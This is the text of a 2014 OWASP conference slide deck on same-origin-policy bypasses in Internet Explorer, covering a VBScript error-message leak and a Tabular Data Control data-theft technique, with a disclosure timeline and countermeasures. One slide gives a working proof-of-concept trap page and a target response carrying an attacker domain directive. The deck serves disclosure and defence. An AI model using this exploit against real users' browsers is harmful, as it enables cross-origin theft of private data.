Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014
1. Bypass SOP, Theft your data
- XSS Allstars from Japan -
Yosuke HASEGAWA
2. About Me
Yosuke HASEGAWA @hasegawayosuke
Engineer of NetAgent Co.,Ltd.
Secure Sky Technology Inc. technical adviser
http://utf-8.jp/
author of jjencode, aaencode, ...
OWASP Kansai Chapter Leader
OWASP Japan Chapter Advisory Board member
5. VBScript Error Msg
Target: IE9-10 (IE6-8 are safe, wow!)
An attacker's trap page loads a cross-origin JSON array as VBScript
VBScript raises an exception whose error message includes the JSON content
JavaScript on the trap page then reads the JSON content out of the error message
9. VBScript Error Msg
supplementary
Dec 2012: reported to MS by me and @masa141421356
May 2013: fixed by MS13-037 only for IE6-8; IE9-10 were not
"Add the X-C-T-O header for IE9-11 to prevent this attack, this is
BEHAVIOR BY DESIGN", they said.
11. Tabular Data Control
Tabular Data Control - TDC
ActiveX control that binds a text file into HTML as a data table
http://msdn.microsoft.com/en-us/library/ms531356.aspx
Enabled by default in IE6-IE11 when the page runs in an older document mode, e.g.
<meta http-equiv="x-ua-compatible" content="IE=10">
Spotlighted by the Cure53 X-Mas Challenge
https://cure53.de/xmas2013/
https://cure53.de/xmas2013/writeup
The winner was @kinugawamasato
12. Tabular Data Control
<!-- Trap page served by the attacker on attacker.utf-8.jp -->
<meta http-equiv="x-ua-compatible" content="IE=10">
<script>
function show() {
  // Fires on ondatasetcomplete: TDC has fetched the cross-origin text file,
  // so read the whole recordset back as one string
  var s = document.getElementById("tdc").recordset.getString();
  alert(s);
}
</script>
<object id="tdc" ondatasetcomplete="show()"
        classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
  <param name="DataURL" value="http://example.jp/target.txt">
</object>

Target response carrying the secret data, http://example.jp/target.txt
(response headers, then body; the first body line is the attacker-inserted directive):
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff

@!allow_domains=attacker.utf-8.jp
secret,data,is,here
13. Tabular Data Control
The attacker has to get "@!allow_domains=..." inserted at the top of the target text
Once it is there, nothing else on the target side prevents the theft
Unhelpful:
X-Content-Type-Options: nosniff
Content-Disposition: attachment
14. Countermeasure
Serve the data only to requests that carry a custom X- header (e.g. X-Requested-With)
XMLHttpRequest can set such a header; the TDC <object> fetch cannot, so its plain GET is refused
and / or...
var xhr = new XMLHttpRequest();
xhr.open( "GET", "http://example.jp/target.txt", true );
xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xhr.send( null );
GET /target.txt HTTP/1.1
Host: example.jp
User-Agent: Mozilla/5.0…
Accept: */*
X-Requested-With: XMLHttpRequest
15. Countermeasure (cont.)
Don't let attacker-controlled text appear at the top of the content
// Target response with secret data on example.jp/target.txt; the first body line is the one the attacker must control
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff
@!allow_domains=attacker.utf-8.jp
secret,data,is,here